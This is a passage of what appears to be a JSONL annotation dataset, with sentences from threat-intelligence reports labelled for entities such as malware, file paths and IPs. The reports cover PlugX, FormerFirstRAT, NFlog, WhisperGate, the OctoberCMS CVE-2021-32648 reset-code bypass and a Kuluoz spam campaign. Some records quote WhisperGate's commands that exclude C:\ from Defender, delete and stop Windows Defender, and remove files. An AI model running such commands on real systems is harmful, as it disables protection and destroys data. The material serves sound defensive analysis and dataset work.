reboots.","entities":[],"relations":[],"Comments":[]} {"id":1293,"text":"It then sends the 'exit' command to this executable, which will kill this particular process.","entities":[],"relations":[],"Comments":[]} {"id":1294,"text":" The malware then attempts to read the following file.","entities":[],"relations":[],"Comments":[]} {"id":1295,"text":"This file is used to store a key that is later used to decrypt data received during network communications.","entities":[],"relations":[],"Comments":[]} {"id":1296,"text":" If the file does not exist, it will make the following GET request: The filename and name parameters are statically set in the above request.","entities":[],"relations":[],"Comments":[]} {"id":1297,"text":"The server responds with data similar to the following: The first two pieces of data ('17' and 'gh204503254') are then written to the ibmCon6.tmp file referenced earlier.","entities":[{"id":46662,"label":"FILEPATH","start_offset":135,"end_offset":146}],"relations":[],"Comments":[]} {"id":1298,"text":" The malware will copy itself to the %TEMP% directory with the executable name of 'notilv.exe'.","entities":[{"id":46663,"label":"FILEPATH","start_offset":37,"end_offset":43},{"id":46664,"label":"FILEPATH","start_offset":83,"end_offset":93}],"relations":[],"Comments":[]} {"id":1299,"text":"Due to the previously written registry key, this file will execute when the machine is restarted and the current user logs in.","entities":[],"relations":[],"Comments":[]} {"id":1300,"text":" The malware then makes the following request: The filename and uid parameters are statically set in the above request.","entities":[],"relations":[],"Comments":[]} {"id":1301,"text":"The response data is decrypted using the RC4 cryptographic stream cipher.","entities":[],"relations":[],"Comments":[]} {"id":1302,"text":"The 'gh204503254' data that was previously downloaded is used as the key.","entities":[],"relations":[],"Comments":[]} {"id":1303,"text":"The following Python code can be used for decryption, using the 'gh204503254' key: At this stage, the remote server can send a number of different responses.","entities":[],"relations":[],"Comments":[]} {"id":1304,"text":"The following example response will instruct the malware to download a remote executable file: 'filename.exe' is the path where the downloaded file will be stored, and '01234567890123456789012345678901' is the value supplied in the subsequent HTTP request.","entities":[{"id":46665,"label":"FILEPATH","start_offset":97,"end_offset":109}],"relations":[],"Comments":[]} {"id":1305,"text":"When this command is received, the following example request is made:","entities":[],"relations":[],"Comments":[]} {"id":1306,"text":" At this point, the remote server will respond with an unencrypted file that the malware saves to the system.","entities":[],"relations":[],"Comments":[]} {"id":1307,"text":" The remote server can also send the following example response.","entities":[],"relations":[],"Comments":[]} {"id":1308,"text":"This response will instruct the malware to upload the specified file:","entities":[],"relations":[],"Comments":[]} {"id":1309,"text":" An example upload request can be seen below: The remote server can also send the following example response.","entities":[],"relations":[],"Comments":[]} {"id":1310,"text":"This response will instruct the malware to execute the given command: The results of this -execution are stored in a temporary text file in the %TEMP% directory.","entities":[{"id":46666,"label":"FILEPATH","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} {"id":1311,"text":"These results are encrypted using the same technique mentioned previously.","entities":[],"relations":[],"Comments":[]} {"id":1312,"text":"An example upload of these results can be seen below: PlugX PlugX is a backdoor that is often used by actors in targeted attacks.","entities":[{"id":3977,"label":"malware","start_offset":55,"end_offset":60},{"id":3978,"label":"malware","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":1313,"text":"This version of PlugX attempts to disguise itself as a Symantec product.","entities":[{"id":3979,"label":"malware","start_offset":16,"end_offset":21},{"id":46667,"label":"identity","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} {"id":1314,"text":"The following icon is present in this sample: Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":1315,"text":"PlugX file uses Symantec logo icon.","entities":[{"id":3983,"label":"malware","start_offset":0,"end_offset":5},{"id":46668,"label":"identity","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":1316,"text":" Upon execution, the malware will install itself as a service with the following parameters: It may also set the following registry key for persistence:","entities":[],"relations":[],"Comments":[]} {"id":1317,"text":" PlugX is a well-studied malware family with a long history of use in targeted attacks.","entities":[{"id":44968,"label":"malware","start_offset":1,"end_offset":6}],"relations":[],"Comments":[]} {"id":1318,"text":"More information on its history is available at the following links.","entities":[],"relations":[],"Comments":[]} {"id":1319,"text":" FormerFirstRAT This remote administration tool (RAT) is referred to as “FormerFirstRAT” by its authors.","entities":[{"id":3989,"label":"malware","start_offset":1,"end_offset":15},{"id":3992,"label":"malware","start_offset":74,"end_offset":88}],"relations":[],"Comments":[]} {"id":1320,"text":"FormerFirstRAT communicates using unencrypted HTTP over port 443; the use of mismatching ports and communication protocols is not uncommon in targeted attack campaigns.","entities":[{"id":3993,"label":"malware","start_offset":0,"end_offset":14},{"id":46669,"label":"campaign","start_offset":142,"end_offset":167}],"relations":[{"id":210,"from_id":46669,"to_id":3993,"type":"uses"}],"Comments":[]} {"id":1321,"text":"In addition, port \/ protocol mis-match traffic can be an indicator of bad activity.","entities":[],"relations":[],"Comments":[]} {"id":1322,"text":" When the malware starts, it writes the following registry key to ensure persistence: The malware then proceeds to send an HTTP POST request with information about the victim system.","entities":[],"relations":[],"Comments":[]} {"id":1323,"text":"The following information is collected:","entities":[],"relations":[],"Comments":[]} {"id":1324,"text":" The following settings are used for command and control: The malware encrypts network communication using the AES128 encryption cipher.","entities":[],"relations":[],"Comments":[]} {"id":1325,"text":"It uses the MD5 of 'tucwatkins' in order to generate the key.","entities":[],"relations":[],"Comments":[]} {"id":1326,"text":"All data is sent via HTTP POST requests.","entities":[],"relations":[],"Comments":[]} {"id":1327,"text":"While not a distinct TTP, the author of this malware may be a soap-opera fan.","entities":[],"relations":[],"Comments":[]} {"id":1328,"text":"The following code demonstrates how you can decrypt the malware communications using Python: The malware then enters a loop where it will send out periodic requests to the remote server.","entities":[],"relations":[],"Comments":[]} {"id":1329,"text":"The remote server has the ability to respond and provide instructions to the RAT.","entities":[],"relations":[],"Comments":[]} {"id":1330,"text":"We have identified the following functionalities:","entities":[],"relations":[],"Comments":[]} {"id":1331,"text":" An example HTTP POST request can be seen below. NFlog When loaded inside of a running process, NFlog begins by spawning a new thread.","entities":[{"id":4011,"label":"malware","start_offset":50,"end_offset":55},{"id":4012,"label":"malware","start_offset":98,"end_offset":103}],"relations":[],"Comments":[]} {"id":1332,"text":"This new thread is responsible for all malicious activities produced by this DLL.","entities":[],"relations":[],"Comments":[]} {"id":1333,"text":"Initially, the malware will set the following registry key: Where [current_executable_filename] is the path to the current running executable, which is acquired via a call to GetModuleFileNameA.","entities":[],"relations":[],"Comments":[]} {"id":1334,"text":"This registry key ensures that the malware will persist across reboots when the current user logs in.","entities":[],"relations":[],"Comments":[]} {"id":1335,"text":" Multiple string obfuscation routines are included in this malware sample.","entities":[],"relations":[],"Comments":[]} {"id":1336,"text":"Strings contained in the binary are decrypted via a simple binary XOR against a single byte key of 0x25.","entities":[],"relations":[],"Comments":[]} {"id":1337,"text":" The malware proceeds to create a named event object of 'GoogleZCM' and uses this event in order to ensure only one instance of this malware is running at a given time.","entities":[],"relations":[],"Comments":[]} {"id":1338,"text":" The malware proceeds to make an attempt at binding to the local host on port 1139.","entities":[],"relations":[],"Comments":[]} {"id":1339,"text":" The malware attempts to ensure Internet connectivity by making a request to www.microsoft.com.","entities":[{"id":46670,"label":"DOMAIN","start_offset":77,"end_offset":94}],"relations":[],"Comments":[]} {"id":1340,"text":"An example request is shown below.","entities":[],"relations":[],"Comments":[]} {"id":1341,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1342,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1343,"text":"This post is also available in: 日本語 (Japanese) Beginning on Jan. 14, 2022, reports began emerging about a series of attacks targeting numerous Ukrainian government websites.","entities":[{"id":46672,"label":"identity","start_offset":149,"end_offset":169},{"id":46671,"label":"TIME","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} {"id":1344,"text":"As a result of these attacks, numerous government websites were found to be either defaced or inaccessible.","entities":[],"relations":[],"Comments":[]} {"id":1346,"text":"A day later, public reporting outlined new malware called WhisperGate that originally was observed on Jan. 13, 2022.","entities":[{"id":46675,"label":"TIME","start_offset":102,"end_offset":115},{"id":46676,"label":"malware","start_offset":58,"end_offset":69}],"relations":[],"Comments":[]} {"id":1347,"text":"This malware disables Windows Defender Threat Protection, is destructive in nature and was discovered to have targeted multiple organizations in Ukraine.","entities":[{"id":44970,"label":"SOFTWARE","start_offset":22,"end_offset":56},{"id":44971,"label":"location","start_offset":145,"end_offset":152}],"relations":[],"Comments":[]} {"id":1348,"text":"Microsoft has publicly attributed the use of this custom malware to a threat actor they refer to as DEV-0586.","entities":[{"id":4045,"label":"threat-actor","start_offset":100,"end_offset":108},{"id":46677,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":1349,"text":" Though both attacks have targeted Ukrainian organizations, the two threats have so far been implemented in separate situations.","entities":[{"id":46678,"label":"identity","start_offset":35,"end_offset":58}],"relations":[],"Comments":[]} {"id":1350,"text":" As a result of these events, Palo Alto Networks researchers took immediate action to ensure that customers anywhere in the world can be appropriately protected against these reported threats, however they may be exploited.","entities":[{"id":44972,"label":"identity","start_offset":30,"end_offset":48}],"relations":[],"Comments":[]} {"id":1351,"text":"These attacks ultimately resulted in the investigation of the following two threats: Palo Alto Networks customers can use Xpanse or Threat Prevention for the Next-Generation Firewall to identify vulnerable and\/or internet-facing instances of OctoberCMS.","entities":[{"id":46679,"label":"identity","start_offset":86,"end_offset":104},{"id":46680,"label":"SOFTWARE","start_offset":123,"end_offset":129},{"id":46681,"label":"SOFTWARE","start_offset":133,"end_offset":150},{"id":46682,"label":"SOFTWARE","start_offset":243,"end_offset":253}],"relations":[],"Comments":[]} {"id":1352,"text":"Protections against WhisperGate malware have been included in Cortex XDR, as well as in the WildFire and Advanced URL Filtering subscriptions for the Next-Generation Firewall.","entities":[{"id":4060,"label":"SOFTWARE","start_offset":92,"end_offset":100},{"id":4058,"label":"malware","start_offset":20,"end_offset":31},{"id":46683,"label":"SOFTWARE","start_offset":62,"end_offset":72}],"relations":[],"Comments":[]} {"id":1353,"text":"There is a Cortex XSOAR pack available to assist with detecting and mitigating both threats.","entities":[{"id":44973,"label":"SOFTWARE","start_offset":11,"end_offset":23}],"relations":[],"Comments":[]} {"id":1354,"text":" CVE-2021-32648 Vulnerability WhisperGate Malware Family Mitigation Actions Hunting for WhisperGate Conclusion Additional Resources","entities":[{"id":46685,"label":"malware","start_offset":30,"end_offset":41},{"id":46684,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":46686,"label":"malware","start_offset":88,"end_offset":99}],"relations":[],"Comments":[]} {"id":1355,"text":" The CVE-2021-32648 vulnerability lies within the OctoberCMS platform prior to version 1.0.472 and results in an attacker gaining access to any account via a specially crafted account password reset request.","entities":[{"id":46687,"label":"vulnerability","start_offset":5,"end_offset":19},{"id":46688,"label":"SOFTWARE","start_offset":50,"end_offset":60}],"relations":[{"id":211,"from_id":46688,"to_id":46687,"type":"has"}],"Comments":[]} {"id":1356,"text":"This vulnerability is believed to have allowed threat actors to gain access to the underlying websites leveraged by the Ukraine government.","entities":[{"id":44974,"label":"identity","start_offset":120,"end_offset":138}],"relations":[],"Comments":[]} {"id":1357,"text":" Once the vulnerability was discovered, Palo Alto Networks threat researchers quickly began reverse-engineering the patch that remediated this vulnerability and were able to produce a working proof of concept (PoC) in a very short time.","entities":[{"id":46689,"label":"identity","start_offset":40,"end_offset":58}],"relations":[],"Comments":[]} {"id":1358,"text":"Later that day, a public PoC surfaced, allowing organizations to better understand this vulnerability and how it is exploited.","entities":[{"id":4075,"label":"TIME","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":1359,"text":"Using our PoC, we created the following demonstration video of how a malicious actor would exploit the CVE-2021-32648 vulnerability, log into the compromised OctoberCMS account and to deface a web page hosted by the server:","entities":[{"id":44975,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":44976,"label":"SOFTWARE","start_offset":158,"end_offset":168}],"relations":[{"id":49,"from_id":44976,"to_id":44975,"type":"has"}],"Comments":[]} {"id":1360,"text":"To determine how this vulnerability was exploited, we analyzed the patch that developers added to OctoberCMS version 1.0.472 to mitigate the CVE-2021-32648 vulnerability.","entities":[{"id":46690,"label":"vulnerability","start_offset":141,"end_offset":155},{"id":46692,"label":"SOFTWARE","start_offset":98,"end_offset":108}],"relations":[{"id":212,"from_id":46692,"to_id":46690,"type":"has"}],"Comments":[]} {"id":1361,"text":"We discovered that the vulnerable code existed in the Auth\/Models\/User.php file within the October Rain library of OctoberCMS.","entities":[{"id":46693,"label":"FILEPATH","start_offset":54,"end_offset":74},{"id":46694,"label":"SOFTWARE","start_offset":115,"end_offset":125}],"relations":[],"Comments":[]} {"id":1362,"text":"The code that exposes this vulnerability is within a function named checkResetPasswordCode, specifically, line 281 in User.php.","entities":[{"id":44977,"label":"FILEPATH","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} {"id":1363,"text":"The following line of code attempts to validate the inbound password reset request by comparing the reset code submitted within the HTTP request with the reset code generated by OctoberCMS during a legitimate reset process: To exploit this vulnerability, the actor would simply supply a boolean true value as the reset code within a custom-crafted HTTP request to reset the password of an account.","entities":[{"id":46695,"label":"SOFTWARE","start_offset":178,"end_offset":188}],"relations":[],"Comments":[]} {"id":1364,"text":"By supplying the boolean true, the comparison between boolean true and the reset code string results in a boolean true, even though the two variables have different types.","entities":[],"relations":[],"Comments":[]} {"id":1365,"text":"This effectively validates the actor’s inbound password reset request, which allows the actor to then change the password To fix this vulnerability in version 1.0.472, the OctoberCMS developer changed the line of code above to use === instead of == when comparing the values of the reset code provided by the user via an HTTP POST request.","entities":[{"id":44978,"label":"SOFTWARE","start_offset":173,"end_offset":183}],"relations":[],"Comments":[]} {"id":1366,"text":"The difference between === and == involves the === comparing the value and type of value of the variable, not just the value, as happens when using ==.","entities":[],"relations":[],"Comments":[]} {"id":1367,"text":"To demonstrate the difference, the following two commands run PHP code to show that a comparison of the string code with boolean true using == results in a boolean true, while the same comparison using === results in a boolean false: As a result of the analysis of the CVE-2021-32648 vulnerability, various product protections were created or enhanced.","entities":[{"id":46696,"label":"vulnerability","start_offset":270,"end_offset":284}],"relations":[],"Comments":[]} {"id":1368,"text":"More information about these protections can be found within the Mitigation Actions section of the briefing.","entities":[],"relations":[],"Comments":[]} {"id":1369,"text":" First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target.","entities":[{"id":46699,"label":"identity","start_offset":19,"end_offset":29},{"id":46697,"label":"SOFTWARE","start_offset":126,"end_offset":152},{"id":46698,"label":"TIME","start_offset":32,"end_offset":45},{"id":46700,"label":"malware","start_offset":47,"end_offset":58}],"relations":[],"Comments":[]} {"id":1370,"text":"It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload.","entities":[{"id":4118,"label":"identity","start_offset":122,"end_offset":131}],"relations":[],"Comments":[]} {"id":1371,"text":"The in-memory code uses Living Off the Land Binaries (LOLBINs) to evade detection and also performs anti-analysis techniques, as it will fail to detonate when certain monitoring tools exist.","entities":[{"id":44979,"label":"tools","start_offset":24,"end_offset":62}],"relations":[],"Comments":[]} {"id":1372,"text":"At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe.","entities":[{"id":46701,"label":"malware","start_offset":66,"end_offset":77},{"id":46702,"label":"FILEPATH","start_offset":79,"end_offset":89},{"id":46703,"label":"FILEPATH","start_offset":94,"end_offset":104}],"relations":[],"Comments":[]} {"id":1373,"text":"Stage1.exe purports to be ransomware, as it overwrites the target’s master boot record with 512 bytes and upon reboot displays the following ransom note: Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN).","entities":[{"id":46706,"label":"FILEPATH","start_offset":155,"end_offset":165},{"id":46707,"label":"Infrastucture","start_offset":256,"end_offset":296},{"id":46705,"label":"FILEPATH","start_offset":0,"end_offset":10}],"relations":[{"id":213,"from_id":46706,"to_id":46707,"type":"beacons-to"}],"Comments":[]} {"id":1374,"text":"Discord’s CDN is a user-created service that allows users to host attachments and is not malicious.","entities":[{"id":46708,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":1375,"text":"The hosted file is retrieved from the following URL: hxxps:\/\/cdn.discordapp[.]com\/attachments\/928503440139771947\/930108637681184768\/Tbopbh.jpg","entities":[{"id":46709,"label":"URL","start_offset":54,"end_offset":143}],"relations":[],"Comments":[]} {"id":1376,"text":"File Tbopbh.jpg is the malicious payload that is in-memory loaded and kicks off the destructive capabilities.","entities":[{"id":46710,"label":"FILEPATH","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} {"id":1377,"text":"The following patterns of activities are associated with this payload: 1. File InstallUtil.exe is copied to the host’s %TEMP% directory, e.g. C:\\Users\\[USERNAME]\\AppData\\Local\\Temp.","entities":[{"id":44981,"label":"FILEPATH","start_offset":80,"end_offset":95},{"id":44983,"label":"FILEPATH","start_offset":120,"end_offset":126},{"id":44982,"label":"FILEPATH","start_offset":143,"end_offset":181}],"relations":[],"Comments":[]} {"id":1378,"text":"This file is a legitimate Microsoft Windows binary.","entities":[{"id":4137,"label":"identity","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} {"id":1379,"text":"Two instances of PowerShell are spawned with an encoded command to sleep for 10 seconds, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== 3.","entities":[{"id":46711,"label":"FILEPATH","start_offset":94,"end_offset":151},{"id":46712,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} {"id":1380,"text":"A Visual Basic Script (VBS) is created in C:\\Users\\[USERNAME]\\AppData\\Local\\Temp named: Nmddfrqqrbyjeygggda.vbs 4. Process wscript.exe is used to execute the VBS script in step 3.","entities":[{"id":44985,"label":"FILEPATH","start_offset":88,"end_offset":111},{"id":44986,"label":"FILEPATH","start_offset":124,"end_offset":135},{"id":44984,"label":"FILEPATH","start_offset":42,"end_offset":80}],"relations":[],"Comments":[]} {"id":1381,"text":"The VBS script is used to call PowerShell to set Windows Defender exclusion path to C:\\ e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Set-MpPreference -ExclusionPath 'C:\\' 5. AdvancedRun.exe is created and written to the C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory. 6.","entities":[{"id":46713,"label":"FILEPATH","start_offset":84,"end_offset":87},{"id":46716,"label":"FILEPATH","start_offset":185,"end_offset":188},{"id":46718,"label":"tools","start_offset":49,"end_offset":65},{"id":46714,"label":"FILEPATH","start_offset":93,"end_offset":150},{"id":46715,"label":"FILEPATH","start_offset":194,"end_offset":209},{"id":46717,"label":"FILEPATH","start_offset":240,"end_offset":278},{"id":46719,"label":"tools","start_offset":31,"end_offset":41},{"id":46720,"label":"tools","start_offset":4,"end_offset":14}],"relations":[],"Comments":[]} {"id":1382,"text":"AdvancedRun.exe is used to execute PowerShell.exe to delete and stop Windows Defender.","entities":[{"id":46721,"label":"FILEPATH","start_offset":0,"end_offset":15},{"id":46722,"label":"FILEPATH","start_offset":35,"end_offset":49},{"id":46723,"label":"SOFTWARE","start_offset":69,"end_offset":85}],"relations":[],"Comments":[]} {"id":1383,"text":"The following command parameters are passed to AdvancedRun: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \/WindowState 0 \/CommandLine \"rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse\" \/StartDirectory \"\" \/RunAs 8 \/Run \"C:\\Users\\USERNAME]AppData\\Local\\Temp\\AdvancedRun.exe\" \/EXEFilename \"C:\\Windows\\System32\\sc.exe\" \/WindowState 0 \/CommandLine \"stop WinDefend\" \/StartDirectory \"\" \/RunAs 8 \/Run 7.","entities":[{"id":44990,"label":"FILEPATH","start_offset":313,"end_offset":339},{"id":44987,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":44988,"label":"FILEPATH","start_offset":157,"end_offset":198},{"id":44989,"label":"FILEPATH","start_offset":245,"end_offset":297},{"id":46724,"label":"SOFTWARE","start_offset":47,"end_offset":58}],"relations":[],"Comments":[]} {"id":1384,"text":"PowerShell process used to delete Windows Defender, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse 8. File InstallUtil.exe running from C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory.","entities":[{"id":4148,"label":"tools","start_offset":0,"end_offset":10},{"id":46727,"label":"FILEPATH","start_offset":122,"end_offset":163},{"id":46726,"label":"FILEPATH","start_offset":57,"end_offset":114},{"id":46728,"label":"FILEPATH","start_offset":183,"end_offset":198},{"id":46725,"label":"tools","start_offset":34,"end_offset":50},{"id":46729,"label":"FILEPATH","start_offset":212,"end_offset":251}],"relations":[],"Comments":[]} {"id":1385,"text":"The in-memory payload (Tbopbh.jpg) is running within the context of the InstallUtil.exe process 9. Multiple instances of cmd.exe calling Ping.exe to delete file InstallUtil.exe, e.g. cmd.exe \/min \/C ping 111.111.111[.]111 -n 5 -w 10 > Nul & Del \/f \/q %TEMP%\\InstallUtil.exe 10. File AdvancedRun.exe is deleted from the C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory by the stage2.exe binary. 11. ICMP traffic to host: 111.111.111[.]111 12.","entities":[{"id":4149,"label":"malware","start_offset":122,"end_offset":129},{"id":4150,"label":"malware","start_offset":184,"end_offset":191},{"id":4151,"label":"tools","start_offset":200,"end_offset":204},{"id":4152,"label":"IPV4","start_offset":205,"end_offset":222},{"id":4154,"label":"IPV4","start_offset":423,"end_offset":440},{"id":46732,"label":"FILEPATH","start_offset":285,"end_offset":300},{"id":46730,"label":"FILEPATH","start_offset":23,"end_offset":33},{"id":46731,"label":"FILEPATH","start_offset":252,"end_offset":274},{"id":46733,"label":"FILEPATH","start_offset":321,"end_offset":387}],"relations":[],"Comments":[]} {"id":1386,"text":"All files and directories, including those on mounted USB drives, excluding the floppy drive (A:) are targeted.","entities":[{"id":46734,"label":"FILEPATH","start_offset":94,"end_offset":96}],"relations":[],"Comments":[]} {"id":1387,"text":"The following file extensions are overwritten with a one-byte value of 0xCC.","entities":[],"relations":[],"Comments":[]} {"id":1388,"text":" 13. Targeted files greater than one megabyte are truncated to one megabyte when overwritten.","entities":[],"relations":[],"Comments":[]} {"id":1389,"text":" 14. Virus & Threat protection is no longer available from Windows Security.","entities":[{"id":46735,"label":"SOFTWARE","start_offset":59,"end_offset":75}],"relations":[],"Comments":[]} {"id":1390,"text":" Organizations running OctoberCMS prior to Build 472 and v1.1.5 are encouraged to update to the latest version.","entities":[{"id":46736,"label":"SOFTWARE","start_offset":23,"end_offset":33}],"relations":[],"Comments":[]} {"id":1391,"text":"Additionally, in order for this vulnerability to be exploited, the web server must be running PHP below 7.4.","entities":[{"id":46737,"label":"SOFTWARE","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} {"id":1392,"text":" Palo Alto Networks customers receive protections against the OctoberCMS vulnerability in the following ways: Palo Alto Networks customers receive protections against WhisperGate malware in the following ways: The Cortex XSOAR \"WhisperGate & CVE-2021-32648'' pack can help automatically detect and mitigate the two threats.","entities":[{"id":44991,"label":"identity","start_offset":1,"end_offset":19},{"id":44996,"label":"SOFTWARE","start_offset":216,"end_offset":228},{"id":44998,"label":"vulnerability","start_offset":244,"end_offset":258},{"id":44993,"label":"identity","start_offset":111,"end_offset":129},{"id":44994,"label":"vulnerability","start_offset":62,"end_offset":86},{"id":44995,"label":"malware","start_offset":168,"end_offset":179},{"id":4172,"label":"malware","start_offset":230,"end_offset":241}],"relations":[{"id":51,"from_id":44995,"to_id":44998,"type":"exploits"},{"id":214,"from_id":4172,"to_id":44998,"type":"exploits"}],"Comments":[]} {"id":1393,"text":"Read more on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} {"id":1394,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":46738,"label":"identity","start_offset":92,"end_offset":99},{"id":46739,"label":"location","start_offset":131,"end_offset":144},{"id":46740,"label":"location","start_offset":185,"end_offset":189},{"id":46741,"label":"location","start_offset":208,"end_offset":212},{"id":46742,"label":"location","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} {"id":1395,"text":" Palo Alto Networks Cortex XDR customers may leverage the following XQL queries, written by the Cortex Managed Threat Hunting service experts, to hunt their datasets for indicators related to WhisperGate malware: The Unit 42 Threat Intelligence team remains vigilant in monitoring this evolving situation, is actively hunting for known indicators from recent events and is ready to put protections in place to thwart attacks against our customers.","entities":[{"id":45003,"label":"malware","start_offset":192,"end_offset":203},{"id":45002,"label":"identity","start_offset":1,"end_offset":19},{"id":45001,"label":"SOFTWARE","start_offset":20,"end_offset":30},{"id":45004,"label":"identity","start_offset":218,"end_offset":225},{"id":46744,"label":"identity","start_offset":218,"end_offset":250},{"id":46745,"label":"identity","start_offset":96,"end_offset":133}],"relations":[],"Comments":[]} {"id":1396,"text":" Product-specific protections have been implemented as a result of research performed in recent days, and those protections will be augmented as needed as more details come to light.","entities":[],"relations":[],"Comments":[]} {"id":1397,"text":"Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":46746,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":1398,"text":" Updated March 4, 2022, at 6:15 a.m. PT.","entities":[{"id":45006,"label":"TIME","start_offset":9,"end_offset":39}],"relations":[],"Comments":[]} {"id":1399,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1400,"text":"At 06:47 PST on May 20 Palo Alto Networks WildFire detected the start of the latest Kuluoz spam campaign.","entities":[{"id":4212,"label":"SOFTWARE","start_offset":42,"end_offset":50},{"id":46747,"label":"TIME","start_offset":3,"end_offset":22},{"id":46748,"label":"identity","start_offset":23,"end_offset":41},{"id":46749,"label":"campaign","start_offset":84,"end_offset":104}],"relations":[],"Comments":[]} {"id":1401,"text":"The total number of e-mails detected quickly rose to over 30,000 per hour around noon PST and had not begun to slow down as of 1:30PM PST.","entities":[{"id":45007,"label":"TIME","start_offset":127,"end_offset":137},{"id":4218,"label":"TIME","start_offset":81,"end_offset":89}],"relations":[],"Comments":[]} {"id":1402,"text":" Kuluoz is a descendant of the Asprox malware and spreads by sending copies of itself as an e-mail attachment.","entities":[{"id":46751,"label":"malware","start_offset":31,"end_offset":37},{"id":46750,"label":"malware","start_offset":1,"end_offset":7},{"id":46752,"label":"attack-pattern","start_offset":61,"end_offset":109}],"relations":[{"id":216,"from_id":46750,"to_id":46751,"type":"variant-of"},{"id":217,"from_id":46751,"to_id":46752,"type":"uses"},{"id":218,"from_id":46750,"to_id":46752,"type":"uses"}],"Comments":[]} {"id":1403,"text":"As the malware infects more systems, the systems begin sending more e-mails which leads to more infections.","entities":[],"relations":[],"Comments":[]} {"id":1404,"text":"Kuluoz makes money for its owner by installing other malware, such as crimeware or fake antivirus programs.","entities":[{"id":45008,"label":"malware","start_offset":0,"end_offset":6},{"id":45009,"label":"attack-pattern","start_offset":70,"end_offset":79},{"id":45010,"label":"attack-pattern","start_offset":83,"end_offset":106}],"relations":[{"id":53,"from_id":45008,"to_id":45009,"type":"uses"},{"id":54,"from_id":45008,"to_id":45010,"type":"uses"}],"Comments":[]} {"id":1405,"text":" Kuluoz e-mails often trick the reader into thinking they are delivery notifications (such as UPS or Fedex), or notices from airlines or payment processors.","entities":[{"id":46753,"label":"malware","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":1406,"text":"In this case the e-mails claim to contain a document about a court case.","entities":[],"relations":[],"Comments":[]} {"id":1407,"text":"Subject: Hearing of your case in Court","entities":[],"relations":[],"Comments":[]} {"id":1408,"text":"From: Notice of Appearance Pretrial Notice, Please, download the copy of the court notice attached herewith to read the details.","entities":[],"relations":[],"Comments":[]} {"id":1409,"text":"Note: The case may be heard by the judge in your absence if you do not come.","entities":[],"relations":[],"Comments":[]} {"id":1410,"text":"Truly yours, Clerk to the Court.","entities":[],"relations":[],"Comments":[]} {"id":1411,"text":"Olivia Smith","entities":[{"id":46754,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":1412,"text":" Each e-mail carries one of the following attachments: These attachments are different versions of the malware that has been packed to evade antivirus engines.","entities":[],"relations":[],"Comments":[]} {"id":1413,"text":"Twelve of the 53 scanners on virustotal.com now detect the first variant of the malware, but only three detect the latest version.","entities":[{"id":45011,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} {"id":1414,"text":" To determine where the highest number of infected nodes are, we mapped the sending IP address for each of the attach e-mails to their rough geographic location.","entities":[],"relations":[],"Comments":[]} {"id":1416,"text":" Geographic Distribution of Koluoz Spam Nodes in North America Thus far we’ve detected the following command and control servers in use.","entities":[{"id":45013,"label":"Infrastucture","start_offset":35,"end_offset":45},{"id":45016,"label":"Infrastucture","start_offset":103,"end_offset":121},{"id":45012,"label":"malware","start_offset":28,"end_offset":34},{"id":45014,"label":"location","start_offset":49,"end_offset":62}],"relations":[{"id":55,"from_id":45012,"to_id":45013,"type":"communicates-with"},{"id":56,"from_id":45013,"to_id":45014,"type":"located-at"}],"Comments":[]} {"id":1417,"text":" The network traffic generated by each Trojan uses the HTTP protocol, and despite its use of port 443, is not encrypted with SSL.","entities":[],"relations":[],"Comments":[]} {"id":1418,"text":" As with most fast-spreading malware, antivirus engines will typically begin detecting the files a day or two after the spread has 